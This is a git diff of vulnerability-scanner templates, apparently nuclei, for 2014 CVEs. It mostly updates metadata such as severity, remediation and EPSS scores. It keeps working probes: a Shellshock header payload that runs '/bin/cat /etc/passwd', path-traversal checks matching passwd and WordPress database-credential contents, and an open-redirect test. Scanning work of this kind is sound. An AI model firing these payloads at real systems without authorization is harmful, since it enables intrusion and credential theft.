https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + epss-score: 0.01024 + epss-percentile: 0.82155 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: levelfourdevelopment + product: wp-easycart + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure http: - method: GET @@ -44,4 +54,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' -# Enhanced by mp on 2022/09/30 +# digest: 4b0a004830460221008ee2932bf2c15333af72be09ca4fc2096be83037d16fa37c62784d42fd5dc22d022100a32ec591b48409881ae68de96ed2dc407ece6136f3cc199e2e80001fb1bb8ee0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index de1a49375f..821adeb015 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -3,20 +3,27 @@ id: CVE-2014-5111 info: name: Fonality trixbox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + remediation: | + Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox. reference: - https://www.exploit-db.com/exploits/39351 - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-5111 - tags: packetstorm,cve,cve2014,lfi,trixbox,edb + cwe-id: CWE-22 + epss-score: 0.0445 + epss-percentile: 0.91461 + cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: packetstorm,cve,cve2014,lfi,trixbox,edb http: - method: GET @@ -25,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a0046304402203862855469b8e1cc4eef067cd5782e606c6b8d3d998a2473bd3ff5b324524d2b022052d73ad7f28e7f0cd2de3355ca13a12727526629db064d9866d28f26e1f97167:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 610d23f495..9fafccf911 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -3,21 +3,29 @@ id: CVE-2014-5258 info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + - http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2014-5258 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2014,lfi + epss-score: 0.01386 + epss-percentile: 0.84894 + cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webedition + product: webedition_cms + tags: edb,packetstorm,cve,cve2014,lfi http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4b0a004830460221008c619337bea11184a15374f9a4864e557579bcd597e25b03956356fcaa60a8fb022100a30991e7d749b4a86a4d6167f1b4968ebbcb9046c4f39b51ca791225e8d2da86:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 4d5daf4594..1364f4e971 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -3,19 +3,28 @@ id: CVE-2014-5368 info: name: WordPress Plugin WP Content Source Control - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + remediation: | + Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 - http://seclists.org/oss-sec/2014/q3/417 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-5368 cwe-id: CWE-22 + epss-score: 0.09191 + epss-percentile: 0.93993 + cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wp_content_source_control_project + product: wp_content_source_control + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-source-control" tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists @@ -27,14 +36,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4a0a0047304502204f45468595e3aa0fe122a51bbee82d41c739a9b64e551144c366030af7d21d9b0221009e8099b0b459cf22fdbe6044348e115ed8bc33ed1a98bee993879f856087bc00:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 2b632576a3..13ab775c22 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -5,21 +5,27 @@ info: author: pentest_swissky,0xelkomy severity: critical description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + remediation: | + Apply the necessary patches and updates provided by the vendor to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A + - http://advisories.mageia.org/MGASA-2014-0388.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 - cpe: cpe:2.3:a:gnu:bash:*:*:*:*:*:*:*:* - epss-score: 0.9756 - tags: cve,cve2014,rce,shellshock,kev + epss-score: 0.97568 + epss-percentile: 0.99999 + cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: gnu + product: bash + tags: cve,cve2014,rce,shellshock,kev http: - method: GET @@ -33,21 +39,22 @@ http: - "{{BaseURL}}/debug.cgi" - "{{BaseURL}}/cgi-bin/test-cgi" + stop-at-first-match: true + headers: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex part: body regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/02/25 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100905417655165e8dc92e2cab39b3212b13f5bd0dd4864fad81c02500c763d6727022100b6da6599908c5b98cc3e36de217576a6163f10947e4bdf4b89a075ea87b15ce4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b3fc584488..b708d42633 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -1,4 +1,4 @@ -id: CVE-2014-6287 +id: 'CVE-2014-6287' info: name: HTTP File Server <2.3c - Remote Command Execution @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287 - http://www.kb.cert.org/vuls/id/251276 @@ -15,16 +17,18 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2014-6287 + cve-id: 'CVE-2014-6287' cwe-id: CWE-94 + epss-score: 0.97289 + epss-percentile: 0.99816 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* - epss-score: 0.97414 metadata: - max-request: 1 - shodan-query: http.favicon.hash:2124459909 verified: true + max-request: 1 + vendor: rejetto + product: http_file_server + shodan-query: http.favicon.hash:2124459909 tags: packetstorm,msf,cve,cve2014,hfs,rce,kev - variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' @@ -52,4 +56,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/12 +# digest: 4a0a00473045022100f49a2c55f1f9a40605569658b7a78fd1fcbb1c87b62a772dfb1d096480e4a99d02200b7b2235974f2355264cf5376ad0935b7c3d43572a4de06573e591c1d26cc43d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 5e9001427d..1609be5cf4 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -3,21 +3,29 @@ id: CVE-2014-6308 info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + remediation: | + Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-6308 cwe-id: CWE-22 - tags: cve,cve2014,lfi,packetstorm + epss-score: 0.0922 + epss-percentile: 0.94002 + cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: osclass + product: osclass + tags: cve,cve2014,lfi,packetstorm http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 490a0046304402207402c86906d4c1e4b8197c7c2b8b5a68c35f64e4d62c9594919975c0f9c1ee5502204adc597244fba49f912b587e94e3bbf24b18e4fc620f2bb3521146a5cba16317:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 8a01476960..c73c5b775c 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + remediation: | + Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html - https://www.exploit-db.com/exploits/37604/ - http://seclists.org/fulldisclosure/2015/Jul/44 - https://nvd.nist.gov/vuln/detail/CVE-2014-8676 + - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-8676 cwe-id: CWE-22 - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + epss-score: 0.00195 + epss-percentile: 0.57165 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: soplanning + product: soplanning + tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi http: - method: GET @@ -35,4 +43,4 @@ http: status: - 200 -# Enhanced by cs on 2022/09/09 +# digest: 4b0a00483046022100d884910866694cce23fda03897d7806e1cf518785fba838fd5093ff92964bfba022100e09f8523d0aa8ff18abb1038398af0d917182818a692eb1a75a917c88482879e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 2d3f2c64f7..f04f68a5a4 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -3,8 +3,10 @@ id: CVE-2014-8682 info: name: Gogs (Go Git Service) - SQL Injection author: dhiyaneshDK,daffainfo - severity: critical + severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + remediation: | + Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - http://seclists.org/fulldisclosure/2014/Nov/33 @@ -13,12 +15,17 @@ info: - https://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2014-8682 cwe-id: CWE-89 + epss-score: 0.00808 + epss-percentile: 0.79842 + cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gogits + product: gogs shodan-query: title:"Sign In - Gogs" tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 +# digest: 490a0046304402204462a2a0ce1f08e86bc3236fc2c7e0d8e771624de2ccf5a1337291424441776a02204b65e9c0d07972d8fbf589ce9e23c626f52cd30603a06a27a21d2edc1d7d9281:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 40621f0b3c..47d6a9fdc6 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -3,19 +3,29 @@ id: CVE-2014-8799 info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + remediation: | + Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://wordpress.org/plugins/dukapress/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943 + - https://plugins.trac.wordpress.org/changeset/1024640/dukapress classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-8799 cwe-id: CWE-22 + epss-score: 0.17844 + epss-percentile: 0.9557 + cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: dukapress + product: dukapress + framework: wordpress google-query: inurl:"/wp-content/plugins/dukapress" tags: cve,cve2014,wordpress,wp-plugin,lfi,edb @@ -27,16 +37,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_USER" - "DB_HOST" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4b0a00483046022100f450f4c21c11ac2c7e375e331fa461031e788a4bdb96591eafb193d998341295022100889880111f1b7a46b42ab6af495c4493058419a7ca45b052bc9080a6bd2d39eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index b59f60d0ae..c871465927 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + remediation: | + Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - http://websecurity.com.ua/7152/ - http://seclists.org/fulldisclosure/2014/Jul/65 - - http://web.archive.org/web/20210615134835/https://www.securityfocus.com/bid/68525 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9094 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.83554 + epss-percentile: 0.98092 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: digitalzoomstudio + product: video_gallery + framework: wordpress google-query: inurl:"/wp-content/plugins/dzs-videogallery" tags: cve2014,wordpress,xss,wp-plugin,seclists,cve @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4a0a00473045022100f32d7b67834a6bfadaa455dfef54c452cc3710e3e61643aa4274031ca637b557022031f1646a267c8d55d9af26e1cc7e43f69a6755370a178914e7c4f0173951f6fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 44d8db5751..5d5ec6379b 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -3,22 +3,31 @@ id: CVE-2014-9119 info: name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + remediation: | + Update WordPress DB Backup plugin to version 4.6 or higher. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 - https://nvd.nist.gov/vuln/detail/CVE-2014-9119 - https://wpvulndb.com/vulnerabilities/7726 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb + epss-score: 0.1414 + epss-percentile: 0.9508 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: db_backup_project + product: db_backup + framework: wordpress + tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb http: - method: GET @@ -38,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 +# digest: 4b0a00483046022100b2349e10d547d941bf7d3622fb40d3ab3ccee458ebabeac4ab330872c519c86a022100a4b9c45ed928052333663ff790bfbc79b9ac38c0452659843831b3b8efa7b556:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml new file mode 100644 index 0000000000..cc01bdf76a --- /dev/null +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -0,0 +1,41 @@ +id: CVE-2014-9180 + +info: + name: Eleanor CMS - Open Redirect + author: Shankar Acharya + severity: medium + description: | + Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING. + remediation: | + Update to the latest version of Eleanor CMS to fix the open redirect vulnerability. + reference: + - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html + - https://nvd.nist.gov/vuln/detail/CVE-2014-9180 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 + cve-id: CVE-2014-9180 + cwe-id: CWE-601 + epss-score: 0.00248 + epss-percentile: 0.62491 + cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: eleanor-cms + product: eleanor_cms + shodan-query: html:"eleanor" + tags: packetstorm,cve,cve2014,eleanor,cms,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/go.php?http://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4b0a00483046022100cc6aee7b339d86786ef116c907a0ffa3d8756e06f5f4acf8e55c4a2dc20720f5022100c6ee6488a064cddd36533104b8c229bd7e68c15ffbf1938da9cc30f28b202949:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index d1a43acb6d..4740e7a2e2 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: medium description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. + remediation: | + Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html - - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9444 - tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth + cwe-id: CWE-79 + epss-score: 0.00287 + epss-percentile: 0.65325 + cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 - + vendor: frontend_uploader_project + product: frontend_uploader + framework: wordpress + tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth http: - method: GET @@ -26,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4a0a0047304502205ed180205cbd21cc6012427e8e8dc85b0aa7c24c135adedb9b0935a726525b6c022100e4ababac8f0bf42e5bff0a016c5b3ad000760f4fdd77d6b2e1790ab8d5f4a719:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index eac313ef85..2d97bcdecc 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve2014,netsweeper,xss,packetstorm,cve + epss-percentile: 0.4136 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,xss,packetstorm,cve http: - method: GET @@ -41,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4b0a00483046022100e9468dae724cdceeced22b56984be0205ad8ce4800b9d9d14a2fd7910347016c022100f126bb0ce4cd0bd8636b96f496f2b866d3ac8cc832b616c90303e4a9002872b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 4718ef93d1..7786b000a0 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: packetstorm,cve,cve2014,netsweeper,xss + epss-percentile: 0.4136 + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: packetstorm,cve,cve2014,netsweeper,xss http: - method: GET @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -41,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4a0a00473045022100b806ecb51d54fcdc9534346b86f0f00a369e8c4f81edc9563ae5f9db426893bd022050393e8a2ab04d872f19099a77baeb60bedefb20307fbf208a805a4f5eb16a73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 86920d09c6..de22e75fb6 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -4,7 +4,10 @@ info: name: Netsweeper 4.0.3 - Cross-Site Scripting author: daffainfo severity: medium - description: A cross-site scripting vulnerability in 